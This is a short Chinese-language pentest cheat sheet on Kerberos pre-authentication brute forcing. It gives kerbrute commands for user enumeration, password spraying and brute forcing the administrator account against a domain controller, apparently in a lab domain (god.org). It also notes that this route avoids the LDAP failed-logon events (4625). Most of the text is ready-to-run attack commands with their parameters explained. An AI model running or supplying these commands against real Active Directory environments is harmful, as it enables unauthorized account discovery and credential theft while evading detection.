Kerberos pre-auth bruteforcing
的速度更快由于没有域用户的口令,所以无法通过LDAP协议枚举出所有域用户,而且使用LDAP协议进行暴力破解时会产生日志(4625 - An account failed to log on)
kerbrute userenum --dc 192.168.52.138 -d god.org user.txt
参数含义
-userenum:用户枚举模式
--dc:指定域控ip
-d:指定域名
-user.txt:用户名字典文件,用户名可不加域名后缀
kerbrute.exe passwordspray --dc 192.168.52.138 -d god.org user.txt P@ss1234
kerbrute.exe bruteuser --dc 192.168.52.138 -d god.org pass.txt administrator
参数含义
-passwordspray:密码枚举模式
--dc:指定域控ip
-d:指定域名
-user.txt:用户名字典文件,用户名可不加域名后缀